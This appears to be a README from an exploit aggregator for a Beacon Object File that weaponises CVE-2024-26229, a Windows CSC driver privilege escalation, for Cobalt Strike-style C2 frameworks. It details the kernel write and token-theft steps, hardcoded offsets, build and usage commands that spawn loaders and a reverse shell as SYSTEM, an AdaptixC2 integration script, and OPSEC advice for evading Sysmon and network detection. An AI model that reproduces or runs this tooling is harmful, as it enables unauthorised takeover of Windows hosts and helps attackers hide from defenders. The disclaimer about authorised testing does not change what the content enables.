## https://sploitus.com/exploit?id=4710ADE0-67D0-585C-9B35-2CF6C08E5242
# CVE-2024-26229 BOF

Beacon Object File implementation of CVE-2024-26229 — Windows CSC driver local privilege escalation via DKOM token theft.

Based on [RalfHacker/CVE-2024-26229-exploit](https://github.com/RalfHacker/CVE-2024-26229-exploit), converted to BOF with Dynamic Function Resolution (DFR) for use with C2 frameworks that support the Cobalt Strike BOF API.

## How It Works

1. Opens `\Device\Mup\;Csc\.\.` via `NtCreateFile` to get a handle to the CSC driver
2. Sends IOCTL `0x001401a3` (`CSC_DEV_FCB_XXX_CONTROL_FILE`, a METHOD_NEITHER code, so the driver receives the caller's raw input-buffer pointer) with the input buffer set to `KTHREAD->PreviousMode - 0x18`. The driver writes through that pointer without checking that it is a user-mode address, clearing `PreviousMode` from `UserMode` (1) to `KernelMode` (0)
3. With `PreviousMode = KernelMode`, `NtReadVirtualMemory` and `NtWriteVirtualMemory` skip the user-address probe, so the process can read and write arbitrary kernel addresses through its own handle
4. Copies the SYSTEM process (`PID 4`) `EPROCESS->Token` over the current process token (DKOM)
5. Restores `PreviousMode` to `UserMode`
6. Spawns the specified executable via `CreateProcessA` — the child inherits the SYSTEM token

The beacon process itself becomes SYSTEM after step 4. The spawned process is optional — if `CreateProcessA` fails, the beacon is still elevated.
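The pointer arithmetic behind steps 2 to 5, as an added worked example (this is not the BOF's code or RalfHacker's exploit, and it never touches a driver): it decodes the IOCTL code into its `CTL_CODE` fields, computes the InputBuffer value for a given KTHREAD address, splits an `EPROCESS->Token` value into object pointer and EX_FAST_REF count, and replays the driver's unchecked write against a fake KTHREAD byte array. The `0x18` displacement, the two offsets and the sample KTHREAD/EPROCESS addresses are the ones in this README; the one-byte write width in the model is an assumption, since the README does not state the real width.

```c
/*
 * Added worked example, not part of the BOF or the original exploit.
 * Models the address arithmetic from the README on a fake in-memory KTHREAD
 * so the numbers can be checked offline. Nothing here talks to csc.sys.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Fields of a Windows I/O control code (CTL_CODE macro layout). */
typedef struct {
    uint32_t device_type;   /* bits 31..16 */
    uint32_t access;        /* bits 15..14 */
    uint32_t function;      /* bits 13..2  */
    uint32_t method;        /* bits 1..0   */
} ioctl_fields;

#define METHOD_NEITHER                  3u
#define FILE_DEVICE_NETWORK_FILE_SYSTEM 0x14u

/* Values from the README (Windows 10 19041-19045). */
#define OFFSET_KTHREAD_PREVIOUSMODE 0x232u
#define OFFSET_EPROCESS_TOKEN       0x4B8u
#define CSC_IOCTL                   0x001401A3u
#define CSC_WRITE_DISPLACEMENT      0x18u   /* driver write lands at InputBuffer + 0x18 */

#define KERNEL_MODE 0u
#define USER_MODE   1u

ioctl_fields ioctl_decode(uint32_t code) {
    ioctl_fields f;
    f.device_type = code >> 16;
    f.access      = (code >> 14) & 0x3u;
    f.function    = (code >> 2) & 0xFFFu;
    f.method      = code & 0x3u;
    return f;
}

/* InputBuffer to pass so that the driver's write at +0x18 hits PreviousMode. */
uint64_t previous_mode_input_buffer(uint64_t kthread) {
    return kthread + OFFSET_KTHREAD_PREVIOUSMODE - CSC_WRITE_DISPLACEMENT;
}

/* Kernel address of the 8-byte Token field inside an EPROCESS. */
uint64_t token_field_address(uint64_t eprocess) {
    return eprocess + OFFSET_EPROCESS_TOKEN;
}

/* EPROCESS->Token is an EX_FAST_REF: the low 4 bits cache a reference count.
   The exploit copies the whole 8 bytes, count bits included. */
uint64_t ex_fast_ref_object(uint64_t token_field) { return token_field & ~0xFull; }
unsigned ex_fast_ref_count(uint64_t token_field)  { return (unsigned)(token_field & 0xFu); }

/* Toy model of the vulnerable driver path: clears the byte at input_buffer + 0x18
   without checking whether the pointer is a user-mode address. The real write
   width is not given in the README; one byte is assumed and suffices here. */
static void model_csc_ioctl(uint8_t *input_buffer) {
    input_buffer[CSC_WRITE_DISPLACEMENT] = 0;
}

/* Runs the model against a fake KTHREAD; returns the resulting PreviousMode. */
uint8_t simulate_previous_mode_flip(void) {
    static uint8_t fake_kthread[0x300];          /* stand-in for the real KTHREAD */
    memset(fake_kthread, 0xCC, sizeof fake_kthread);
    fake_kthread[OFFSET_KTHREAD_PREVIOUSMODE] = USER_MODE;
    uint64_t base  = (uint64_t)(uintptr_t)fake_kthread;
    uint64_t input = previous_mode_input_buffer(base);
    model_csc_ioctl((uint8_t *)(uintptr_t)input);
    return fake_kthread[OFFSET_KTHREAD_PREVIOUSMODE];
}

int main(void) {
    ioctl_fields f = ioctl_decode(CSC_IOCTL);
    printf("IOCTL 0x%08x: device 0x%x access %u function 0x%x method %u%s\n",
           CSC_IOCTL, f.device_type, f.access, f.function, f.method,
           f.method == METHOD_NEITHER ? " (METHOD_NEITHER: raw user pointers reach the driver)" : "");

    uint64_t kthread  = 0xffff9383fa4df080ull;   /* sample values from the README output */
    uint64_t eprocess = 0xffff9383f3a62040ull;
    printf("InputBuffer for KTHREAD %llx: %llx\n",
           (unsigned long long)kthread, (unsigned long long)previous_mode_input_buffer(kthread));
    printf("SYSTEM EPROCESS->Token lives at %llx\n",
           (unsigned long long)token_field_address(eprocess));
    printf("PreviousMode after model write: %u (0 = KernelMode)\n", simulate_previous_mode_flip());
    return 0;
}
```

The METHOD_NEITHER result is the crux: with that transfer type the I/O manager hands the caller's pointers to the driver untouched, so a driver that skips its own address check will happily write into kernel memory on the caller's behalf.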

## Target

- **OS:** Windows 10 2004 through 22H2 (builds 19041–19045) with the hardcoded offsets below. Server 2019 (build 17763) and Windows 11 are not covered by those offsets; re-verify before use
- **Requirement:** CSC driver enabled (`HKLM\SYSTEM\CurrentControlSet\Services\CSC` → `Start = 1`, i.e. `SERVICE_SYSTEM_START`)
- **Patched in:** April 2024 cumulative update (the target must be missing it)

### Kernel Offsets (Hardcoded)

| Offset | Value | Structure |
|--------|-------|-----------|
| `EPROCESS->Token` | `0x4B8` | Windows 10 19041–19045 |
| `KTHREAD->PreviousMode` | `0x232` | Windows 10 19041–19045 |

These offsets are version-specific. Server 2019 (17763) has a different `EPROCESS` layout (`Token` at `0x358`), so the BOF must be rebuilt with that value for it. For any other build, verify against a matching kernel with WinDbg:
```
dt nt!_EPROCESS Token
dt nt!_KTHREAD PreviousMode
```

## Compilation

Requires `mingw-w64` and a `beacon.h` header compatible with your C2 framework.

```bash
x86_64-w64-mingw32-gcc -c -o cve-2024-26229.x64.o cve-2024-26229.c
```

Place the compiled `.o` in your BOF directory (e.g., `_bin/cve-2024-26229.x64.o`).

## Usage

```
cve-2024-26229 --path <executable> [--args "<arguments>"]
```

### Examples

Spawn a loader with local shellcode:
```
cve-2024-26229 --path C:\Users\user\loader.exe --args "--munition-local C:\Users\user\payload.bin"
```

Spawn a reverse shell:
```
cve-2024-26229 --path C:\Windows\System32\cmd.exe --args "/c C:\Users\user\shell.exe"
```

Run without arguments:
```
cve-2024-26229 --path C:\Users\user\beacon.exe
```

### Expected Output

```
[+] System EPROCESS  = 0xffff9383f3a62040
[+] Current KTHREAD  = 0xffff9383fa4df080
[+] Current EPROCESS = 0xffff9383fa9b3080
[!] DKOM: overwriting EPROCESS->Token
[+] Token replaced -- beacon process is now SYSTEM
[+] Spawned PID 2044 as SYSTEM: C:\Users\user\loader.exe --munition-local C:\Users\user\payload.bin
```

## AdaptixC2 / AXS Integration

Register the BOF in your `.axs` extension script:

```javascript
var cmd_cve26229 = ax.create_command(
    "cve-2024-26229",
    "CVE-2024-26229 CSC driver LPE -- DKOM token theft to SYSTEM",
    "cve-2024-26229 --path C:\\loader.exe --args \"--munition-local C:\\payload.bin\""
);
cmd_cve26229.addArgFlagString("--path", "path", "Path to executable to run as SYSTEM", "");
cmd_cve26229.addArgFlagString("--args", "args", "Arguments for the executable", "");
cmd_cve26229.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let path = parsed_json["path"];
    let args = parsed_json["args"];

    if (!path) {
        ax.task_output(id, "Error: --path is required");
        return;
    }

    let bof_params = ax.bof_pack("cstr,cstr", [path, args]);
    let bof_path = ax.script_dir() + "_bin/cve-2024-26229." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Task: CVE-2024-26229 LPE");
});
```

Argument packing is `cstr,cstr`: two length-prefixed, null-terminated strings matching the two `BeaconDataExtract` calls in the BOF. An omitted `--args` is still packed as an empty string (one null byte), so the second extract always has something to read.
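How those two strings travel, as an added example that is not the BOF's source or `beacon.h`: it packs a path and an argument string in the layout `bof_pack("cstr,cstr", ...)` is assumed to emit (the Cobalt Strike convention of a 4-byte total length followed by 4-byte-length-prefixed, NUL-terminated strings) and parses them back with the same cursor semantics as `BeaconDataParse`/`BeaconDataExtract`, adding the bounds checks the reference `beacon.h` does not perform. The function and type names are this example's own.

```c
/*
 * Added example, not the BOF's code and not beacon.h.
 * Assumed wire layout (Cobalt Strike convention, little-endian):
 *   [u32 total_len][u32 len1][bytes1 + NUL][u32 len2][bytes2 + NUL] ...
 * Each per-string length counts the terminating NUL.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static void put_u32(uint8_t *p, uint32_t v) {
    p[0] = v & 0xFF; p[1] = (v >> 8) & 0xFF; p[2] = (v >> 16) & 0xFF; p[3] = (v >> 24) & 0xFF;
}
static uint32_t get_u32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Pack n C strings; returns bytes written, or 0 if out is too small. */
size_t bof_pack_cstrs(const char **strs, size_t n, uint8_t *out, size_t cap) {
    size_t off = 4;                              /* leave room for the total-length header */
    for (size_t i = 0; i < n; i++) {
        size_t len = strlen(strs[i]) + 1;        /* include the NUL, as 'cstr' does */
        if (off + 4 + len > cap) return 0;
        put_u32(out + off, (uint32_t)len);
        memcpy(out + off + 4, strs[i], len);
        off += 4 + len;
    }
    put_u32(out, (uint32_t)(off - 4));           /* length of everything after the header */
    return off;
}

/* Parser model with BeaconDataParse/BeaconDataExtract cursor semantics plus bounds checks. */
typedef struct { const uint8_t *buf; size_t len; } datap_model;

int bof_parse_begin(datap_model *p, const uint8_t *buf, size_t size) {
    if (size < 4 || get_u32(buf) > size - 4) return 0;
    p->buf = buf + 4;
    p->len = get_u32(buf);
    return 1;
}

const char *bof_extract_cstr(datap_model *p) {
    if (p->len < 4) return NULL;                         /* no length prefix left */
    uint32_t n = get_u32(p->buf);
    if (n == 0 || n > p->len - 4 || p->buf[4 + n - 1] != '\0') return NULL;
    const char *s = (const char *)(p->buf + 4);
    p->buf += 4 + n;
    p->len -= 4 + n;
    return s;
}

/* Mirrors the BOF's argument handling: exactly two cstr extracts. 1 on success. */
int bof_read_path_and_args(const uint8_t *buf, size_t size, const char **path, const char **args) {
    datap_model p;
    *path = *args = NULL;
    if (!bof_parse_begin(&p, buf, size)) return 0;
    *path = bof_extract_cstr(&p);
    *args = bof_extract_cstr(&p);
    return *path != NULL && *args != NULL;
}

int main(void) {
    uint8_t buf[256];
    const char *in[2] = { "C:\\Users\\user\\beacon.exe", "" };   /* constructed sample */
    const char *path, *args;

    size_t n = bof_pack_cstrs(in, 2, buf, sizeof buf);
    if (bof_read_path_and_args(buf, n, &path, &args))
        printf("path=%s args=\"%s\" (%zu bytes packed)\n", path, args, n);

    /* Packing a single string leaves the second extract with nothing to read. */
    size_t m = bof_pack_cstrs(in, 1, buf, sizeof buf);
    printf("one-string buffer satisfies two extracts: %d\n",
           bof_read_path_and_args(buf, m, &path, &args));
    return 0;
}
```

The one-string case is why the format string in the `.axs` script and the number of `BeaconDataExtract` calls in the BOF must agree: the reference parser does not check bounds, so a mismatch reads past the packed data instead of failing cleanly.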

## OPSEC Notes

- **Few userland artifacts** — the escalation itself is a kernel memory write through the corrupted `PreviousMode`: the BOF writes no files, creates no services and touches no registry keys. The executable you spawn, and any payload it reads from disk, are artifacts you bring yourself.
- **No network indicators** — the exploit is local-only. Pair with a loader that reads shellcode from disk (`--munition-local` pattern) rather than fetching over HTTP to avoid network-based detections.
- **Process creation** — `CreateProcessA` with `CREATE_NO_WINDOW`. The spawned process inherits the SYSTEM token. If your loader injects into another process (e.g., `svchost.exe`), the on-disk loader can be cleaned up afterward.
- **Sysmon** — the `NtCreateFile` call to `\Device\Mup\;Csc\.\.` and the IOCTL are not commonly logged by default Sysmon configurations. The `CreateProcessA` call will generate a standard Process Create (Event ID 1), which records the new process's user and integrity level and, on recent Sysmon versions, its parent's user. A `NT AUTHORITY\SYSTEM` child of a process running as an ordinary user is the parent/child mismatch that token-theft detections key on, so the spawn, not the IOCTL, is the observable; ensure your spawned binary is not signatured.
- **PreviousMode restoration** — the BOF restores `PreviousMode` to `UserMode` after the token copy. The beacon process continues to function normally post-exploitation.

## Limitations

- **x64 only** — hardcoded offsets and pointer arithmetic assume 64-bit
- **Offsets are build-specific** — the hardcoded `EPROCESS->Token` (`0x4B8`) and `KTHREAD->PreviousMode` (`0x232`) values are valid for Windows 10 19041–19045. Server 2019 (17763) has `EPROCESS->Token` at `0x358`; any other build must be checked with WinDbg before use, since a wrong offset means a kernel write to the wrong field and a likely bugcheck.
- **CSC driver must be enabled** — check `sc query csc` or registry `HKLM\SYSTEM\CurrentControlSet\Services\CSC` (`Start = 1`). The driver is enabled by default on workstations but may be disabled on servers.
- **Single use per process** — the DKOM modifies the beacon's own EPROCESS token. Running the BOF twice in the same beacon is redundant (already SYSTEM).
- **Token reference count** — as with any token-pointer DKOM, the copy takes no reference on the SYSTEM token object and never releases the beacon's original token. The imbalance is absorbed in practice by the SYSTEM token's large reference count, but it is a reason to keep this to a long-lived beacon rather than a process that is created and torn down repeatedly.

## Credits

- [RalfHacker](https://github.com/RalfHacker/CVE-2024-26229-exploit) — original standalone exploit
- [Natel](https://github.com/) — testing and review

## References

- [CVE-2024-26229 on vulners](https://vulners.com/cve/CVE-2024-26229)
- [Microsoft Security Update Guide: CVE-2024-26229](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26229)

## Legal Disclaimer

This tool is intended for authorized penetration testing and security research only.

Use of this tool against systems you do not own or do not have explicit written
permission to test is illegal under Vietnamese law, including but not limited to:

- **Luật An toàn thông tin mạng 2015** (Law on Network Information Security,
  No. 86/2015/QH13) — prohibits unauthorized access to information systems
- **Bộ luật Hình sự 2015, sửa đổi 2017** (Penal Code, Articles 225–226) —
  criminalizes unauthorized intrusion into computer networks and destruction
  of data

This tool is provided for **educational purposes only**. The author assumes no
liability for misuse. You are solely responsible for ensuring your use complies
with all applicable local, national, and international laws.

By using this tool you confirm that you have obtained proper authorization from
the system owner prior to any testing activity.